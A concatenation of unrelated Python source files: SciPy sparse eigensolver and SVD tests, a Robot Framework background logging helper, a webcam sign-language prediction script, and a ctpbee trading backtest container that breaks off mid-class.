mattype : {csr_matrix, aslinearoperator, asarray}, optional
Linear operator type
Returns
-------
tol
Tolerance to pass to the ARPACK routine
rtol
Relative tolerance for outputs
atol
Absolute tolerance for outputs
"""
rtol = {'f': 3000 * np.finfo(np.float32).eps,
'F': 3000 * np.finfo(np.float32).eps,
'd': 2000 * np.finfo(np.float64).eps,
'D': 2000 * np.finfo(np.float64).eps}[type_char]
atol = rtol
tol = 0
if mattype is aslinearoperator and type_char in ('f', 'F'):
# iterative methods in single precision: worse errors
# also: bump ARPACK tolerance so that the iterative method converges
tol = 30 * np.finfo(np.float32).eps
rtol *= 5
if mattype is csr_matrix and type_char in ('f', 'F'):
# sparse in single precision: worse errors
rtol *= 5
return tol, rtol, atol
def generate_matrix(N, complex=False, hermitian=False,
pos_definite=False, sparse=False):
M = np.random.random((N,N))
if complex:
M = M + 1j * np.random.random((N,N))
if hermitian:
if pos_definite:
if sparse:
i = np.arange(N)
j = np.random.randint(N, size=N-2)
i, j = np.meshgrid(i, j)
M[i,j] = 0
M = np.dot(M.conj(), M.T)
else:
M = np.dot(M.conj(), M.T)
if sparse:
i = np.random.randint(N, size=N * N // 4)
j = np.random.randint(N, size=N * N // 4)
ind = np.where(i == j)
j[ind] = (j[ind] + 1) % N
M[i,j] = 0
M[j,i] = 0
else:
if sparse:
i = np.random.randint(N, size=N * N // 2)
j = np.random.randint(N, size=N * N // 2)
M[i,j] = 0
return M
def _aslinearoperator_with_dtype(m):
m = aslinearoperator(m)
if not hasattr(m, 'dtype'):
x = np.zeros(m.shape[1])
m.dtype = (m * x).dtype
return m
def assert_allclose_cc(actual, desired, **kw):
"""Almost equal or complex conjugates almost equal"""
try:
assert_allclose(actual, desired, **kw)
except:
assert_allclose(actual, conj(desired), **kw)
def argsort_which(eval, typ, k, which,
sigma=None, OPpart=None, mode=None):
"""Return sorted indices of eigenvalues using the "which" keyword
from eigs and eigsh"""
if sigma is None:
reval = np.round(eval, decimals=_ndigits[typ])
else:
if mode is None or mode == 'normal':
if OPpart is None:
reval = 1. / (eval - sigma)
elif OPpart == 'r':
reval = 0.5 * (1. / (eval - sigma)
+ 1. / (eval - np.conj(sigma)))
elif OPpart == 'i':
reval = -0.5j * (1. / (eval - sigma)
- 1. / (eval - np.conj(sigma)))
elif mode == 'cayley':
reval = (eval + sigma) / (eval - sigma)
elif mode == 'buckling':
reval = eval / (eval - sigma)
else:
raise ValueError("mode='%s' not recognized" % mode)
reval = np.round(reval, decimals=_ndigits[typ])
if which in ['LM', 'SM']:
ind = np.argsort(abs(reval))
elif which in ['LR', 'SR', 'LA', 'SA', 'BE']:
ind = np.argsort(np.real(reval))
elif which in ['LI', 'SI']:
# for LI,SI ARPACK returns largest,smallest abs(imaginary) why?
if typ.islower():
ind = np.argsort(abs(np.imag(reval)))
else:
ind = np.argsort(np.imag(reval))
else:
raise ValueError("which='%s' is unrecognized" % which)
if which in ['LM', 'LA', 'LR', 'LI']:
return ind[-k:]
elif which in ['SM', 'SA', 'SR', 'SI']:
return ind[:k]
elif which == 'BE':
return np.concatenate((ind[:k//2], ind[k//2-k:]))
def eval_evec(symmetric, d, typ, k, which, v0=None, sigma=None,
mattype=np.asarray, OPpart=None, mode='normal'):
general = ('bmat' in d)
if symmetric:
eigs_func = eigsh
else:
eigs_func = eigs
if general:
err = ("error for %s:general, typ=%s, which=%s, sigma=%s, "
"mattype=%s, OPpart=%s, mode=%s" % (eigs_func.__name__,
typ, which, sigma,
mattype.__name__,
OPpart, mode))
else:
err = ("error for %s:standard, typ=%s, which=%s, sigma=%s, "
"mattype=%s, OPpart=%s, mode=%s" % (eigs_func.__name__,
typ, which, sigma,
mattype.__name__,
OPpart, mode))
a = d['mat'].astype(typ)
ac = mattype(a)
if general:
b = d['bmat'].astype(typ.lower())
bc = mattype(b)
# get exact eigenvalues
exact_eval = d['eval'].astype(typ.upper())
ind = argsort_which(exact_eval, typ, k, which,
sigma, OPpart, mode)
exact_eval = exact_eval[ind]
# compute arpack eigenvalues
kwargs = dict(which=which, v0=v0, sigma=sigma)
if eigs_func is eigsh:
kwargs['mode'] = mode
else:
kwargs['OPpart'] = OPpart
# compute suitable tolerances
kwargs['tol'], rtol, atol = _get_test_tolerance(typ, mattype)
# on rare occasions, ARPACK routines return results that are proper
# eigenvalues and -vectors, but not necessarily the ones requested in
# the parameter which. This is inherent to the Krylov methods, and
# should not be treated as a failure. If such a rare situation
# occurs, the calculation is tried again (but at most a few times).
ntries = 0
while ntries < 5:
# solve
if general:
try:
eval, evec = eigs_func(ac, k, bc, **kwargs)
except ArpackNoConvergence:
kwargs['maxiter'] = 20*a.shape[0]
eval, evec = eigs_func(ac, k, bc, **kwargs)
else:
try:
eval, evec = eigs_func(ac, k, **kwargs)
except ArpackNoConvergence:
kwargs['maxiter'] = 20*a.shape[0]
eval, evec = eigs_func(ac, k, **kwargs)
ind = argsort_which(eval, typ, k, which,
sigma, OPpart, mode)
eval = eval[ind]
evec = evec[:,ind]
# check eigenvectors
LHS = np.dot(a, evec)
if general:
RHS = eval * np.dot(b, evec)
else:
RHS = eval * evec
assert_allclose(LHS, RHS, rtol=rtol, atol=atol, err_msg=err)
try:
# check eigenvalues
assert_allclose_cc(eval, exact_eval, rtol=rtol, atol=atol,
err_msg=err)
break
except AssertionError:
ntries += 1
# check eigenvalues
assert_allclose_cc(eval, exact_eval, rtol=rtol, atol=atol, err_msg=err)
class DictWithRepr(dict):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<%s>" % self.name
class SymmetricParams:
def __init__(self):
self.eigs = eigsh
self.which = ['LM', 'SM', 'LA', 'SA', 'BE']
self.mattypes = [csr_matrix, aslinearoperator, np.asarray]
self.sigmas_modes = {None: ['normal'],
0.5: ['normal', 'buckling', 'cayley']}
# generate matrices
# these should all be float32 so that the eigenvalues
# are the same in float32 and float64
N = 6
np.random.seed(2300)
Ar = generate_matrix(N, hermitian=True,
pos_definite=True).astype('f').astype('d')
M = generate_matrix(N, hermitian=True,
pos_definite=True).astype('f').astype('d')
Ac = generate_matrix(N, hermitian=True, pos_definite=True,
complex=True).astype('F').astype('D')
v0 = np.random.random(N)
# standard symmetric problem
SS = DictWithRepr("std-symmetric")
SS['mat'] = Ar
SS['v0'] = v0
SS['eval'] = eigh(SS['mat'], eigvals_only=True)
# general symmetric problem
GS = DictWithRepr("gen-symmetric")
GS['mat'] = Ar
GS['bmat'] = M
GS['v0'] = v0
GS['eval'] = eigh(GS['mat'], GS['bmat'], eigvals_only=True)
# standard hermitian problem
SH = DictWithRepr("std-hermitian")
SH['mat'] = Ac
SH['v0'] = v0
SH['eval'] = eigh(SH['mat'], eigvals_only=True)
# general hermitian problem
GH = DictWithRepr("gen-hermitian")
GH['mat'] = Ac
GH['bmat'] = M
GH['v0'] = v0
GH['eval'] = eigh(GH['mat'], GH['bmat'], eigvals_only=True)
self.real_test_cases = [SS, GS]
self.complex_test_cases = [SH, GH]
class NonSymmetricParams:
def __init__(self):
self.eigs = eigs
self.which = ['LM', 'LR', 'LI'] # , 'SM', 'LR', 'SR', 'LI', 'SI']
self.mattypes = [csr_matrix, aslinearoperator, np.asarray]
self.sigmas_OPparts = {None: [None],
0.1: ['r'],
0.1 + 0.1j: ['r', 'i']}
# generate matrices
# these should all be float32 so that the eigenvalues
# are the same in float32 and float64
N = 6
np.random.seed(2300)
Ar = generate_matrix(N).astype('f').astype('d')
M = generate_matrix(N, hermitian=True,
pos_definite=True).astype('f').astype('d')
Ac = generate_matrix(N, complex=True).astype('F').astype('D')
v0 = np.random.random(N)
# standard real nonsymmetric problem
SNR = DictWithRepr("std-real-nonsym")
SNR['mat'] = Ar
SNR['v0'] = v0
SNR['eval'] = eig(SNR['mat'], left=False, right=False)
# general real nonsymmetric problem
GNR = DictWithRepr("gen-real-nonsym")
GNR['mat'] = Ar
GNR['bmat'] = M
GNR['v0'] = v0
GNR['eval'] = eig(GNR['mat'], GNR['bmat'], left=False, right=False)
# standard complex nonsymmetric problem
SNC = DictWithRepr("std-cmplx-nonsym")
SNC['mat'] = Ac
SNC['v0'] = v0
SNC['eval'] = eig(SNC['mat'], left=False, right=False)
# general complex nonsymmetric problem
GNC = DictWithRepr("gen-cmplx-nonsym")
GNC['mat'] = Ac
GNC['bmat'] = M
GNC['v0'] = v0
GNC['eval'] = eig(GNC['mat'], GNC['bmat'], left=False, right=False)
self.real_test_cases = [SNR, GNR]
self.complex_test_cases = [SNC, GNC]
def test_symmetric_modes():
params = SymmetricParams()
k = 2
symmetric = True
for D in params.real_test_cases:
for typ in 'fd':
for which in params.which:
for mattype in params.mattypes:
for (sigma, modes) in params.sigmas_modes.items():
for mode in modes:
yield (eval_evec, symmetric, D, typ, k, which,
None, sigma, mattype, None, mode)
def test_hermitian_modes():
params = SymmetricParams()
k = 2
symmetric = True
for D in params.complex_test_cases:
for typ in 'FD':
for which in params.which:
if which == 'BE':
continue # BE invalid for complex
for mattype in params.mattypes:
for sigma in params.sigmas_modes:
yield (eval_evec, symmetric, D, typ, k, which,
None, sigma, mattype)
def test_symmetric_starting_vector():
params = SymmetricParams()
symmetric = True
for k in [1, 2, 3, 4, 5]:
for D in params.real_test_cases:
for typ in 'fd':
v0 = random.rand(len(D['v0'])).astype(typ)
yield (eval_evec, symmetric, D, typ, k, 'LM', v0)
def test_symmetric_no_convergence():
np.random.seed(1234)
m = generate_matrix(30, hermitian=True, pos_definite=True)
tol, rtol, atol = _get_test_tolerance('d')
try:
w, v = eigsh(m, 4, which='LM', v0=m[:, 0], maxiter=5, tol=tol, ncv=9)
raise AssertionError("Spurious no-error exit")
except ArpackNoConvergence as err:
k = len(err.eigenvalues)
if k <= 0:
raise AssertionError("Spurious no-eigenvalues-found case")
w, v = err.eigenvalues, err.eigenvectors
assert_allclose(dot(m, v), w * v, rtol=rtol, atol=atol)
def test_real_nonsymmetric_modes():
params = NonSymmetricParams()
k = 2
symmetric = False
for D in params.real_test_cases:
for typ in 'fd':
for which in params.which:
for mattype in params.mattypes:
for sigma, OPparts in params.sigmas_OPparts.items():
for OPpart in OPparts:
yield (eval_evec, symmetric, D, typ, k, which,
None, sigma, mattype, OPpart)
def test_complex_nonsymmetric_modes():
params = NonSymmetricParams()
k = 2
symmetric = False
for D in params.complex_test_cases:
for typ in 'DF':
for which in params.which:
for mattype in params.mattypes:
for sigma in params.sigmas_OPparts:
yield (eval_evec, symmetric, D, typ, k, which,
None, sigma, mattype)
def test_standard_nonsymmetric_starting_vector():
params = NonSymmetricParams()
sigma = None
symmetric = False
for k in [1, 2, 3, 4]:
for d in params.complex_test_cases:
for typ in 'FD':
A = d['mat']
n = A.shape[0]
v0 = random.rand(n).astype(typ)
yield (eval_evec, symmetric, d, typ, k, "LM", v0, sigma)
def test_general_nonsymmetric_starting_vector():
params = NonSymmetricParams()
sigma = None
symmetric = False
for k in [1, 2, 3, 4]:
for d in params.complex_test_cases:
for typ in 'FD':
A = d['mat']
n = A.shape[0]
v0 = random.rand(n).astype(typ)
yield (eval_evec, symmetric, d, typ, k, "LM", v0, sigma)
def test_standard_nonsymmetric_no_convergence():
np.random.seed(1234)
m = generate_matrix(30, complex=True)
tol, rtol, atol = _get_test_tolerance('d')
try:
w, v = eigs(m, 4, which='LM', v0=m[:, 0], maxiter=5, tol=tol)
raise AssertionError("Spurious no-error exit")
except ArpackNoConvergence as err:
k = len(err.eigenvalues)
if k <= 0:
raise AssertionError("Spurious no-eigenvalues-found case")
w, v = err.eigenvalues, err.eigenvectors
for ww, vv in zip(w, v.T):
assert_allclose(dot(m, vv), ww * vv, rtol=rtol, atol=atol)
def test_eigen_bad_shapes():
# A is not square.
A = csc_matrix(np.zeros((2, 3)))
assert_raises(ValueError, eigs, A)
def test_eigen_bad_kwargs():
# Test eigen on wrong keyword argument
A = csc_matrix(np.zeros((2, 2)))
assert_raises(ValueError, eigs, A, which='XX')
def test_ticket_1459_arpack_crash():
for dtype in [np.float32, np.float64]:
# XXX: this test does not seem to catch the issue for float32,
# but we made the same fix there, just to be sure
N = 6
k = 2
np.random.seed(2301)
A = np.random.random((N, N)).astype(dtype)
v0 = np.array([-0.71063568258907849895, -0.83185111795729227424,
-0.34365925382227402451, 0.46122533684552280420,
-0.58001341115969040629, -0.78844877570084292984e-01],
dtype=dtype)
# Should not crash:
evals, evecs = eigs(A, k, v0=v0)
#----------------------------------------------------------------------
# sparse SVD tests
def sorted_svd(m, k, which='LM'):
# Compute svd of a dense matrix m, and return singular vectors/values
# sorted.
if isspmatrix(m):
m = m.todense()
u, s, vh = svd(m)
if which == 'LM':
ii = np.argsort(s)[-k:]
elif which == 'SM':
ii = np.argsort(s)[:k]
else:
raise ValueError("unknown which=%r" % (which,))
return u[:, ii], s[ii], vh[ii]
def svd_estimate(u, s, vh):
return np.dot(u, np.dot(np.diag(s), vh))
def svd_test_input_check():
x = np.array([[1, 2, 3],
[3, 4, 3],
[1, 0, 2],
[0, 0, 1]], float)
assert_raises(ValueError, svds, x, k=-1)
assert_raises(ValueError, svds, x, k=0)
assert_raises(ValueError, svds, x, k=10)
assert_raises(ValueError, svds, x, k=x.shape[0])
assert_raises(ValueError, svds, x, k=x.shape[1])
assert_raises(ValueError, svds, x.T, k=x.shape[0])
assert_raises(ValueError, svds, x.T, k=x.shape[1])
def test_svd_simple_real():
x = np.array([[1, 2, 3],
[3, 4, 3],
[1, 0, 2],
[0, 0, 1]], float)
y = np.array([[1, 2, 3, 8],
[3, 4, 3, 5],
[1, 0, 2, 3],
[0, 0, 1, 0]], float)
z = csc_matrix(x)
for m in [x.T, x, y, z, z.T]:
for k in range(1, min(m.shape)):
u, s, vh = sorted_svd(m, k)
su, ss, svh = svds(m, k)
m_hat = svd_estimate(u, s, vh)
sm_hat = svd_estimate(su, ss, svh)
assert_array_almost_equal_nulp(m_hat, sm_hat, nulp=1000)
def test_svd_simple_complex():
x = np.array([[1, 2, 3],
[3, 4, 3],
[1 + 1j, 0, 2],
[0, 0, 1]], complex)
y = np.array([[1, 2, 3, 8 + 5j],
[3 - 2j, 4, 3, 5],
[1, 0, 2, 3],
[0, 0, 1, 0]], complex)
z = csc_matrix(x)
for m in [x, x.T.conjugate(), x.T, y, y.conjugate(), z, z.T]:
for k in range(1, min(m.shape) - 1):
u, s, vh = sorted_svd(m, k)
su, ss, svh = svds(m, k)
m_hat = svd_estimate(u, s, vh)
sm_hat = svd_estimate(su, ss, svh)
assert_array_almost_equal_nulp(m_hat, sm_hat, nulp=1000)
def test_svd_maxiter():
# check that maxiter works as expected
x = hilbert(6)
# ARPACK shouldn't converge on such an ill-conditioned matrix with just
# one iteration
assert_raises(ArpackNoConvergence, svds, x, 1, maxiter=1, ncv=3)
# but 100 iterations should be more than enough
u, s, vt = svds(x, 1, maxiter=100, ncv=3)
assert_allclose(s, [1.7], atol=0.5)
def test_svd_return():
# check that the return_singular_vectors parameter works as expected
x = hilbert(6)
_, s, _ = sorted_svd(x, 2)
ss = svds(x, 2, return_singular_vectors=False)
assert_allclose(s, ss)
def test_svd_which():
# check that the which parameter works as expected
x = hilbert(6)
for which in ['LM', 'SM']:
_, s, _ = sorted_svd(x, 2, which=which)
ss = svds(x, 2, which=which, return_singular_vectors=False)
ss.sort()
assert_allclose(s, ss, atol=np.sqrt(1e-15))
def test_svd_v0():
# check that the v0 parameter works as expected
x = np.array([[1, 2, 3, 4], [5, 6, 7, 8]], float)
u, s, vh = svds(x, 1)
u2, s2, vh2 = svds(x, 1, v0=u[:,0])
assert_allclose(s, s2, atol=np.sqrt(1e-15))
def _check_svds(A, k, U, s, VH):
n, m = A.shape
# Check shapes.
assert_equal(U.shape, (n, k))
assert_equal(s.shape, (k,))
assert_equal(VH.shape, (k, m))
# Check that the original matrix can be reconstituted.
A_rebuilt = (U*s).dot(VH)
assert_equal(A_rebuilt.shape, A.shape)
assert_allclose(A_rebuilt, A)
# Check that U is a semi-orthogonal matrix.
UH_U = np.dot(U.T.conj(), U)
assert_equal(UH_U.shape, (k, k))
assert_allclose(UH_U, np.identity(k), atol=1e-12)
# Check that V is a semi-orthogonal matrix.
VH_V = np.dot(VH, VH.T.conj())
assert_equal(VH_V.shape, (k, k))
assert_allclose(VH_V, np.identity(k), atol=1e-12)
def test_svd_LM_ones_matrix():
# Check that svds can deal with matrix_rank less than k in LM mode.
k = 3
for n, m in (6, 5), (5, 5), (5, 6):
for t in float, complex:
A = np.ones((n, m), dtype=t)
U, s, VH = svds(A, k)
# Check some generic properties of svd.
_check_svds(A, k, U, s, VH)
# Check that the largest singular value is near sqrt(n*m)
# and the other singular values have been forced to zero.
assert_allclose(np.max(s), np.sqrt(n*m))
assert_array_equal(sorted(s)[:-1], 0)
def test_svd_LM_zeros_matrix():
# Check that svds can deal with matrices containing only zeros.
k = 1
for n, m in (3, 4), (4, 4), (4, 3):
for t in float, complex:
A = np.zeros((n, m), dtype=t)
U, s, VH = svds(A, k)
# Check some generic properties of svd.
_check_svds(A, k, U, s, VH)
# Check that the singular values are zero.
assert_array_equal(s, 0)
def test_svd_LM_zeros_matrix_gh_3452():
# Regression test for a github issue.
# https://github.com/scipy/scipy/issues/3452
# Note that for complex dype the size of this matrix is too small for k=1.
n, m, k = 4, 2, 1
A = np.zeros((n, m))
U, s, VH = svds(A, k)
# Check some generic properties of svd.
_check_svds(A, k, U, s, VH)
# Check that the singular values are zero.
assert_array_equal(s, 0)
class CheckingLinearOperator(LinearOperator):
def __init__(self, A):
self.A = A
self.dtype = A.dtype
self.shape = A.shape
def _matvec(self, x):
assert_equal(max(x.shape), np.size(x))
return self.A.dot(x)
def _rmatvec(self, x):
assert_equal(max(x.shape), np.size(x))
return self.A.T.conjugate().dot(x)
def test_svd_linop():
nmks = [(6, 7, 3),
(9, 5, 4),
(10, 8, 5)]
def reorder(args):
U, s, VH = args
j = np.argsort(s)
return U[:,j], s[j], VH[j,:]
for n, m, k in nmks:
# Test svds on a LinearOperator.
A = np.random.RandomState(52).randn(n, m)
L = CheckingLinearOperator(A)
v0 = np.ones(min(A.shape))
U1, s1, VH1 = reorder(svds(A, k, v0=v0))
U2, s2, VH2 = reorder(svds(L, k, v0=v0))
assert_allclose(np.abs(U1), np.abs(U2))
assert_allclose(s1, s2)
assert_allclose(np.abs(VH1), np.abs(VH2))
assert_allclose(np.dot(U1, np.dot(np.diag(s1), VH1)),
np.dot(U2, np.dot(np.diag(s2), VH2)))
# Try again with which="SM".
A = np.random.RandomState(1909).randn(n, m)
L = CheckingLinearOperator(A)
U1, s1, VH1 = reorder(svds(A, k, which="SM"))
U2, s2, VH2 = reorder(svds(L, k, which="SM"))
assert_allclose(np.abs(U1), np.abs(U2))
assert_allclose(s1, s2)
assert_allclose(np.abs(VH1), np.abs(VH2))
assert_allclose(np.dot(U1, np.dot(np.diag(s1), VH1)),
np.dot(U2, np.dot(np.diag(s2), VH2)))
if k < min(n, m) - 1:
# Complex input and explicit which="LM".
for (dt, eps) in [(complex, 1e-7), (np.complex64, 1e-3)]:
rng = np.random.RandomState(1648)
A = (rng.randn(n, m) + 1j * rng.randn(n, m)).astype(dt)
L = CheckingLinearOperator(A)
U1, s1, VH1 = reorder(svds(A, k, which="LM"))
U2, s2, VH2 = reorder(svds(L, k, which="LM"))
assert_allclose(np.abs(U1), np.abs(U2), rtol=eps)
assert_allclose(s1, s2, rtol=eps)
assert_allclose(np.abs(VH1), np.abs(VH2), rtol=eps)
assert_allclose(np.dot(U1, np.dot(np.diag(s1), VH1)),
np.dot(U2, np.dot(np.diag(s2), VH2)), rtol=eps)
def test_linearoperator_deallocation():
# Check that the linear operators used by the Arpack wrappers are
# deallocatable by reference counting -- they are big objects, so
# Python's cyclic GC may not collect them fast enough before
# running out of memory if eigs/eigsh are called in a tight loop.
M_d = np.eye(10)
M_s = csc_matrix(M_d)
M_o = aslinearoperator(M_d)
with assert_deallocated(lambda: arpack.SpLuInv(M_s)):
pass
with assert_deallocated(lambda: arpack.LuInv(M_d)):
pass
with assert_deallocated(lambda: arpack.IterInv(M_s)):
pass
with assert_deallocated(lambda: arpack.IterOpInv(M_o, None, 0.3)):
pass
with assert_deallocated(lambda: arpack.IterOpInv(M_o, M_o, 0.3)):
pass
def test_svds_partial_return():
x = np.array([[1, 2, 3],
[3, 4, 3],
[1, 0, 2],
[0, 0, 1]], float)
# test vertical matrix
z = csr_matrix(x)
vh_full = svds(z, 2)[-1]
vh_partial = svds(z, 2, return_singular_vectors='vh')[-1]
dvh = np.linalg.norm(np.abs(vh_full) - np.abs(vh_partial))
if dvh > 1e-10:
raise AssertionError('right eigenvector matrices differ when using return_singular_vectors parameter')
if svds(z, 2, return_singular_vectors='vh')[0] is not None:
raise AssertionError('left eigenvector matrix was computed when it should not have been')
# test horizontal matrix
z = csr_matrix(x.T)
u_full = svds(z, 2)[0]
u_partial = svds(z, 2, return_singular_vectors='vh')[0]
du = np.linalg.norm(np.abs(u_full) - np.abs(u_partial))
if du > 1e-10:
raise AssertionError('left eigenvector matrices differ when using return_singular_vectors parameter')
if svds(z, 2, return_singular_vectors='u')[-1] is not None:
raise AssertionError('right eigenvector matrix was computed when it should not have been')
def test_svds_wrong_eigen_type():
# Regression test for a github issue.
# https://github.com/scipy/scipy/issues/4590
# Function was not checking for eigenvalue type and unintended
# values could be returned.
x = np.array([[1, 2, 3],
[3, 4, 3],
[1, 0, 2],
[0, 0, 1]], float)
assert_raises(ValueError, svds, x, 1, which='LA')
def test_parallel_threads():
results = []
v0 = np.random.rand(50)
def worker():
x = diags([1, -2, 1], [-1, 0, 1], shape=(50, 50))
w, v = eigs(x, k=3, v0=v0)
results.append(w)
w, v = eigsh(x, k=3, v0=v0)
results.append(w)
threads = [threading.Thread(target=worker) for k in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
worker()
for r in results:
assert_allclose(r, results[-1])
def test_reentering():
# Just some linear operator that calls eigs recursively
def A_matvec(x):
x = diags([1, -2, 1], [-1, 0, 1], shape=(50, 50))
w, v = eigs(x, k=1)
return v / w[0]
A = LinearOperator(matvec=A_matvec, dtype=float, shape=(50, 50))
# The Fortran code is not reentrant, so this fails (gracefully, not crashing)
assert_raises(RuntimeError, eigs, A, k=1)
assert_raises(RuntimeError, eigsh, A, k=1)
def test_regression_arpackng_1315():
# Check that issue arpack-ng/#1315 is not present.
# Adapted from arpack-ng/TESTS/bug_1315_single.c
# If this fails, then the installed ARPACK library is faulty.
for dtype in [np.float32, np.float64]:
np.random.seed(1234)
w0 = np.arange(1, 1000+1).astype(dtype)
A = diags([w0], [0], shape=(1000, 1000))
v0 = np.random.rand(1000).astype(dtype)
w, v = eigs(A, k=9, ncv=2*9+1, which="LM", v0=v0)
assert_allclose(np.sort(w), np.sort(w0[-9:]),
rtol=1e-4)
if __name__ == "__main__":
run_module_suite()
|
background_logs.py
|
import threading
from robot.api.logger import BackgroundLogger
logger = BackgroundLogger()
def log_from_main(msg):
logger.info(msg)
def log_from_background(msg, thread=None):
t = threading.Thread(target=logger.info, args=(msg,))
if thread:
t.setName(thread)
t.start()
def log_background_messages(thread=None):
logger.log_background_messages(thread)
|
live_predict.py
|
from sys import argv
import cv2
import mediapipe as mp
import itertools
import numpy as np
import time
from collections import deque
from multiprocessing import Queue, Process
from queue import Empty
import atexit
from math import ceil
from pathlib import Path
import holistic
import common
USE_HOLISTIC = False
PRINT_FREQ = 30
PRED_FREQ = 5
assert PRINT_FREQ % PRED_FREQ == 0
LABELS = common.get_labels('data/')
def video_loop(feature_q, prediction_q, use_holistic):
cap = cv2.VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
cap.set(cv2.CAP_PROP_FOURCC, fourcc)
if not cap.isOpened():
print("Error opening Camera")
fps = cap.get(cv2.CAP_PROP_FPS)
print("Webcam FPS = {}".format(fps))
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
mp_drawing = mp.solutions.drawing_utils
print("Awaiting start signal from predict")
prediction_q.get()
timestamp = None
delay = 0
tag = deque([" "]*5, 5)
pdecay = time.time()
print("starting image cap")
for image, results in holistic.process_capture(cap, use_holistic):
newtime = time.time()
if timestamp is not None:
diff = newtime - timestamp
# Uncomment to print time between each frame
# print(diff)
timestamp = newtime
raw_flat_row = holistic.to_landmark_row(results, use_holistic)
normalized_row = holistic.normalize_features(raw_flat_row)
feature_q.put(np.array(normalized_row))
try:
out = prediction_q.get_nowait()
prediction = np.argmax(out)
if delay >= PRINT_FREQ:
if out[prediction] > .6:
print("{} {}%".format(
LABELS[prediction], out[prediction]*100))
if LABELS[prediction] not in [tag[-1], None, "None"]:
tag.append(LABELS[prediction])
pdecay = time.time()
else:
print("None ({} {}% Below threshold)".format(
LABELS[prediction], out[prediction]*100))
delay = 0
if feature_q.qsize() > 5:
print(
"Warning: Model feature queue overloaded - size = {}".format(feature_q.qsize()))
print("--> ", end='')
for i, label in enumerate(out):
print("{}:{:.2f}% | ".format(LABELS[i], label*100), end='')
print("\n")
except Empty:
pass
delay += 1
if time.time() - pdecay > 7:
tag = deque([" "]*5, 5)
holistic.draw_landmarks(image, results, use_holistic, ' '.join(tag))
cv2.imshow("SignSense", image)
def predict_loop(feature_q, prediction_q):
import tensorflow as tf
import keras
import train
print("Starting prediction init")
train.init_gpu()
model = keras.models.load_model(model_path)
print("Sending ready to video loop")
prediction_q.put("start")
delay = 0
window = None
results = None
results_len = ceil(PRINT_FREQ / PRED_FREQ)
print("Starting prediction")
while True:
row = feature_q.get()
if window is None:
window = np.zeros((train.TIMESTEPS, len(row)))
# Discard oldest frame and append new frame to data window
window[:-1] = window[1:]
window[-1] = row
if delay >= PRED_FREQ:
out = model(np.array([window]))
if results is None:
results = np.zeros((results_len, len(LABELS)))
results[:-1] = results[1:]
results[-1] = out
prediction_q.put(np.mean(results, axis=0))
delay = 0
delay += 1
def live_predict(model_path, use_holistic):
f_q = Queue()
p_q = Queue()
p = Process(target=video_loop, args=(f_q, p_q, use_holistic,))
atexit.register(exit_handler, p)
p.start()
predict_loop(f_q, p_q)
def exit_handler(p):
try:
p.kill()
except:
print("Couldn't kill video_loop")
if __name__ == "__main__":
model_path = argv[1]
# Use MP Hands only
live_predict(model_path, USE_HOLISTIC)
|
vessel.py
|
"""
回测容器模块, 回测
"""
import os
from threading import Thread
from time import sleep
from ctpbee.log import VLogger
from ctpbee.looper.data import VessData
from ctpbee.looper.interface import LocalLooper
from ctpbee.cprint_config import CP
class LooperApi:
def __init__(self, name):
self.name = name
def on_bar(self, bar):
raise NotImplemented
def on_tick(self, tick):
raise NotImplemented
def on_trade(self, trade):
raise NotImplemented
def on_order(self, order):
raise NotImplemented
def on_position(self, position):
raise NotImplemented
def on_account(self, account):
raise NotImplemented
def on_contract(self, contract):
raise NotImplemented
def init_params(self, data):
""" 用户需要继承此方法"""
# print("我在设置策略参数")
class LooperLogger:
def __init__(self, v_logger=None):
if v_logger:
self.logger = v_logger
else:
self.logger = VLogger(CP, app_name="Vessel")
self.logger.set_default(name=self.logger.app_name, owner='App')
def info(self, msg, **kwargs):
kwargs['owner'] = "Looper"
self.logger.info(msg, **kwargs)
def error(self, msg, **kwargs):
kwargs['owner'] = "Looper"
self.logger.error(msg, **kwargs)
def debug(self, msg, **kwargs):
kwargs['owner'] = "Looper"
self.logger.debug(msg, **kwargs)
def warning(self, msg, **kwargs):
kwargs['owner'] = "Looper"
self.logger.warning(msg, **kwargs)
def __repr__(self):
return "LooperLogger -----> just enjoy it"
class Vessel:
"""
策略运行容器
本地回测与在线数据回测
>> 基于在线数据推送的模式 是否可以减少本机器的内存使用量
"""
def __init__(self, logger_class=None, pattern="T0"):
self.ready = False
self.looper_data: VessData = None
if logger_class:
self.logger = logger_class()
else:
self.logger = LooperLogger()
self.risk = None
self.strategy = None
self.interface = LocalLooper(logger=self.logger, strategy=self.strategy, risk=self.risk)
self.params = dict()
self.looper_pattern = pattern
"""
_data_status : 数据状态, 准备就绪时候应该被修改为True
_looper_status: 回测状态, 分为五个
"unready": 未就绪
"ready":就绪
"running": 运行中
"stopped":暂停
"finished":结束
_strategy_status: 策略状态, 载入后应该被修改True
_risk_status: "风控状态"
"""
self._data_status = False
self._looper_status = "unready"
self._strategy_status = False
self._risk_status = True
def add_strategy(self, strategy):
""" 添加策略到本容器 """
self.strategy = strategy
self.interface.update_strategy(strategy)
self._strategy_status = True
self.check_if_ready()
def add_data(self, data):
""" 添加data到本容器, 如果没有经过处理 """
d = VessData(data)
self.looper_data = d
self._data_status = True
self.check_if_ready()
def check_if_ready(self):
if self._data_status and self._strategy_status and self._risk_status:
self._looper_status = "ready"
self.ready = True
def add_risk(self, risk):
""" 添加风控 """
self._risk_status = True
self.interface.update_risk(risk)
self.check_if_ready()
def set_params(self, params):
if not isinstance(params, dict):
raise ValueError(f"配置信息格式出现问题, 你当前的配置信息为 {type(params)}")
self.params = params
def get_result(self):
""" 计算回测结果,生成回测报告 """
return self.interface.account.result
def letsgo(self, parmas, ready):
if self.looper_data.init_flag:
self.logger.info(f"产品: {self.looper_data.product}")
self.logger.info(f"回测模式: {self.looper_pattern}")
for x in range(self.looper_data.length):
if ready:
""" 如果处于就绪状态 那么直接开始继续回测 """
try:
p = next(self.looper_data)
self.interface(p, parmas)
except StopIteration:
self._looper_status = "finished"
break
else:
""" 如果处于未就绪状态 那么暂停回测 """
sleep(1)
self.logger.info("回测结束,正在生成回测报告")
def suspend_looper(self):
""" 暂停回测 """
self.ready = False
self._looper_status = "stopped"
def enable_looper(self):
""" 继续回测 """
self.ready = True
self._looper_status = "running"
@property
def looper_status(self):
return self._looper_status
@property
def risk_status(self):
return self._risk_status
@property
def data_status(self):
return self._data_status
@property
def strategy_status(self):
return self._strategy_status
@property
def status(self):
